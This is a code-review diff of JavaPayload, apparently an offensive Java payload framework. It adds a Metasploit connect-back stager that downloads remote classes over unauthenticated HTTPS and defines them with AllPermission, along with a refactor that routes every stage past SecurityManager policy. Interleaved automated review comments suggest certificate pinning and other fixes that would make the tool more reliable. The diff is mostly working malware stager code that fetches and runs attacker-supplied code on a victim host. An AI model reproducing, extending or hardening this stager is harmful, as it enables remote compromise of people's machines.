+ return new MethodAdapter(super.visitMethod(access, "main", desc, signature, exceptions)) {
+ public void visitLdcInsn(Object cst) {
+ if ("TO_BE_REPLACED".equals(cst))
+ DynStagerBuilder.visitStringConstant(mv, replaceDataString);
+ else if (cst instanceof Long && ((Long) cst).longValue() == 4242)
+ super.visitLdcInsn(new Long(seed));
+ else
+ super.visitLdcInsn(cst);
+ };
+ };
+ }
+ return null;
+ }
+
+ public FieldVisitor visitField(int arg0, String arg1, String arg2, String arg3, Object arg4) {
+ return null;
+ }
+ };
+
+ ClassBuilder.visitClass(getClass(), templateVisitor, cw);
+ return cw.toByteArray();
+ }
+
+ protected abstract byte[] generateReplaceData(String className, byte[] innerClassBytes, long seed) throws Exception;
+
+ // subclasses must implement a method like this:
+ public static void templateMain(String[] args) throws Exception {
+ }
+}
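Review bot: crypt copies the template method's frame sizes unchanged (`new ClassWriter(0)` computes nothing) while replacing the single `ldc "TO_BE_REPLACED"` with whatever `DynStagerBuilder.visitStringConstant` emits; if that helper splits strings beyond the 65535-byte constant-pool limit into several pushes joined at runtime — its loop over `MAXLEN` in this commit suggests it does — the rewritten `main` needs more operand-stack slots than the template's `visitMaxs` declared and the class fails verification for large inner classes. Either construct the writer with `ClassWriter.COMPUTE_MAXS` or override `visitMaxs` in the MethodAdapter to add the slots the helper needs. Separately, `super.visit(version, access, className, ...)` uses className as the JVM internal name, so a dotted binary name (`a.b.C`) would yield a class whose name does not match the `C.class` file ClassBuilder.buildClass writes — a `replace('.', '/')` or an explicit check would catch that.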
66 JavaPayload/src/javapayload/handler/stager/MetasploitURL.java
@@ -0,0 +1,66 @@
+/*
+ * Java Payloads.
+ *
+ * Copyright (c) 2012 Michael 'mihi' Schierl
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * - Redistributions of source code must retain the above copyright notice,
+ * this list of conditions and the following disclaimer.
+ *
+ * - Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * - Neither name of the copyright holders nor the names of its
+ * contributors may be used to endorse or promote products derived from
+ * this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+package javapayload.handler.stager;
+
+import java.io.PrintStream;
+
+import javapayload.Parameter;
+import javapayload.handler.stage.StageHandler;
+
+public class MetasploitURL extends StagerHandler {
+
+ public MetasploitURL() {
+ super("Connect to Metasploit via URL", false, false,
+ "This stager is used to connect to a Metasploit handler with a\r\n" +
+ "reverse_http(s) stager.");
+ }
+
+ public Parameter[] getParameters() {
+ return new Parameter[] {
+ new Parameter("URL", false, Parameter.TYPE_URL, "URL to connect back to"),
+ };
+ }
+
+ protected void handle(StageHandler stageHandler, String[] parameters, PrintStream errorStream, Object extraArg, StagerHandler readyHandler) throws Exception {
+ throw new RuntimeException("MetasploitURL cannot be used as a handler");
+ }
+
+ protected boolean needHandleBeforeStart() {
+ throw new RuntimeException("MetasploitURL cannot be used as a standalone stager!");
+ }
+
+ protected String getTestArguments() {
+ return null;
+ }
+}
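Review bot: Nothing on the class says why a handler exists whose `handle` and `needHandleBeforeStart` both throw; from the stager side (`// only useful when used with a Metasploit multi/handler`) the intent appears to be that the module is registered so the builders can find and document the stager, with Metasploit doing the actual handling. A class Javadoc stating exactly that, plus `UnsupportedOperationException` instead of `RuntimeException` for the two guards, would tell a reader the throws are a design decision rather than unfinished code. The URL parameter description should also state that `https:` URLs are accepted by the stager without certificate validation, since that is a property the operator should know before choosing this module.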
98 JavaPayload/src/javapayload/stager/MetasploitURL.java
@@ -0,0 +1,98 @@
+/*
+ * Java Payloads.
+ *
+ * Copyright (c) 2012 Michael 'mihi' Schierl
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * - Redistributions of source code must retain the above copyright notice,
+ * this list of conditions and the following disclaimer.
+ *
+ * - Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * - Neither name of the copyright holders nor the names of its
+ * contributors may be used to endorse or promote products derived from
+ * this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.stager;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.InputStream;
+import java.net.URL;
+import java.net.URLConnection;
+import java.security.cert.X509Certificate;
+
+import javax.net.ssl.HostnameVerifier;
+import javax.net.ssl.HttpsURLConnection;
+import javax.net.ssl.SSLContext;
+import javax.net.ssl.SSLSession;
+import javax.net.ssl.TrustManager;
+import javax.net.ssl.X509TrustManager;
+
+// only useful when used with a Metasploit multi/handler
+public class MetasploitURL extends Stager implements X509TrustManager, HostnameVerifier {
+
+ public void bootstrap(String[] parameters, boolean needWait) throws Exception {
+ String url = parameters[1];
+ InputStream in;
+ if (url.startsWith("raw:")) {
+ // for debugging: just use raw bytes from property file
+ in = new ByteArrayInputStream(url.substring(4).getBytes("ISO-8859-1"));
+ } else if (url.startsWith("call:")) {
+ in = (InputStream) Class.forName(url.substring(5)).getMethod("getIn", null).invoke(null, null);
+ } else if (url.startsWith("https:")) {
+ URLConnection uc = new URL(url).openConnection();
+ if (uc instanceof HttpsURLConnection) {
+ HttpsURLConnection huc = ((HttpsURLConnection) uc);
+ SSLContext sc = SSLContext.getInstance("SSL");
+ sc.init(null, new TrustManager[] { this }, new java.security.SecureRandom());
+ huc.setSSLSocketFactory(sc.getSocketFactory());
+ huc.setHostnameVerifier(this);
+ }
+ in = uc.getInputStream();
+ } else {
+ in = new URL(url).openStream();
+ }
+ bootstrap(in, new ByteArrayOutputStream(), parameters);
+ }
+
+ public void waitReady() throws InterruptedException {
+ }
+
+ public X509Certificate[] getAcceptedIssuers() {
+ // no preferred issuers
+ return new X509Certificate[0];
+ }
+
+ public void checkClientTrusted(java.security.cert.X509Certificate[] certs, String authType) {
+ // trust everyone
+ }
+
+ public void checkServerTrusted(java.security.cert.X509Certificate[] certs, String authType) {
+ // trust everyone
+ }
+
+ public boolean verify(String hostname, SSLSession session) {
+ // trust everyone
+ return true;
+ }
+}
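Review bot: `checkServerTrusted`, `checkClientTrusted` and `verify` accept anything, so the `https:` branch authenticates nothing: the bytes read from `uc.getInputStream()` go to `bootstrap(in, ...)`, which defines them as classes under AllPermission (Stager.define), so any on-path party that answers the URL gets code execution on the victim — the same outcome as plain `http:`, with a misleading padlock. Where the handler certificate is fixed at build time (a Metasploit HandlerSSLCert, if the operator sets one), pin it: embed the SHA-256 of the DER certificate and compare it in `checkServerTrusted`; if the fingerprint is unknown at build time, the class comment should at least say that `https:` gives transport encryption only. Independently, `SSLContext.getInstance("SSL")` should be `"TLS"` on any JRE where SSLv3 is still negotiable. The fence shows the pinned variant; `PINNED_HANDLER_CERT_SHA256` stands for the build-time byte[] constant.
```java
// … unchanged: bootstrap(), except for this line …
SSLContext sc = SSLContext.getInstance("TLS");

public void checkServerTrusted(java.security.cert.X509Certificate[] certs, String authType) throws java.security.cert.CertificateException {
    // The stage received over this connection runs with AllPermission; without
    // pinning, anyone who can answer the URL gets code execution on the victim.
    if (certs == null || certs.length == 0)
        throw new java.security.cert.CertificateException("no handler certificate presented");
    try {
        byte[] actual = java.security.MessageDigest.getInstance("SHA-256").digest(certs[0].getEncoded());
        if (!java.security.MessageDigest.isEqual(actual, PINNED_HANDLER_CERT_SHA256))
            throw new java.security.cert.CertificateException("handler certificate does not match pinned fingerprint");
    } catch (java.security.NoSuchAlgorithmException e) {
        throw new java.security.cert.CertificateException(e.toString());
    }
}
```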
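--- a/JavaPayload/src/javapayload/stager/PollingTunnel.java
+++ b/JavaPayload/src/javapayload/stager/PollingTunnel.java
@@ -39,12 +39,8 @@
 import java.io.OutputStream;
 import java.io.PipedInputStream;
 import java.io.PipedOutputStream;
-import java.net.URL;
 import java.security.AllPermission;
-import java.security.CodeSource;
 import java.security.Permissions;
-import java.security.ProtectionDomain;
-import java.security.cert.Certificate;
 public class PollingTunnel extends Stager implements Runnable {
@@ -142,9 +138,8 @@ public String sendData(String data) throws IOException {
 byte[] classfile = decodeASCII85(data.substring(1));
 final Permissions permissions = new Permissions();
 permissions.add(new AllPermission());
- final ProtectionDomain pd = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
 synchronized(this) {
- resolveClass(wposClass = defineClass(null, classfile, 0, classfile.length, pd));
+ resolveClass(wposClass = define(classfile));
 notifyAll();
 }
 return "9";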
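Review bot: `resolveClass(wposClass = define(classfile))` resolves twice — the new Stager.define already calls resolveClass on the class it returns — so the outer call is redundant and the line can become `wposClass = define(classfile);`. The `permissions` local built two lines above is now unused as far as the hunk shows, since define() creates its own AllPermission domain, and can be deleted together with the two security imports the hunk keeps. sendData continues outside the hunk.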
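--- a/JavaPayload/src/javapayload/stager/Stager.java
+++ b/JavaPayload/src/javapayload/stager/Stager.java
@@ -35,6 +35,7 @@
 package javapayload.stager;
 import java.io.DataInputStream;
+import java.io.IOException;
 import java.io.InputStream;
 import java.io.OutputStream;
 import java.io.PrintStream;
@@ -51,14 +52,11 @@ protected final void bootstrap(InputStream rawIn, OutputStream out, String[] par
 try {
 final DataInputStream in = new DataInputStream(rawIn);
 Class clazz;
- final Permissions permissions = new Permissions();
- permissions.add(new AllPermission());
- final ProtectionDomain pd = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
 int length = in.readInt();
 do {
 final byte[] classfile = new byte[length];
 in.readFully(classfile);
- resolveClass(clazz = defineClass(null, classfile, 0, length, pd));
+ clazz = define(classfile);
 length = in.readInt();
 if (length == 0) {
 break;
@@ -70,6 +68,15 @@ protected final void bootstrap(InputStream rawIn, OutputStream out, String[] par
 t.printStackTrace(new PrintStream(out, true));
 }
 }
+
+ protected final Class define(byte[] classfile) throws IOException {
+ final Permissions permissions = new Permissions();
+ permissions.add(new AllPermission());
+ final ProtectionDomain pd = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
+ Class clazz = defineClass(null, classfile, 0, classfile.length, pd);
+ resolveClass(clazz);
+ return clazz;
+ }
 public abstract void bootstrap(String[] parameters, boolean needWait) throws Exception;
 public abstract void waitReady() throws InterruptedException;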
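Review bot: define() builds a fresh Permissions and ProtectionDomain for every class it defines, and its `throws IOException` exists only because `new URL("file:///")` declares MalformedURLException, which this constant can never raise; a lazily initialised private field holding the domain would remove the per-class allocations, while the declared exception has to stay as it is because JTCPfwdBuilder.findClass catches IOException around the call in this same commit. The method also deserves a comment stating what it deliberately does, since every stager now funnels through it: `// Every stage class is defined under a file:/// code source with AllPermission, so a SecurityManager policy on the target does not constrain the stage — intended for this payload, never reuse for code you do not trust.` bootstrap continues outside its hunks.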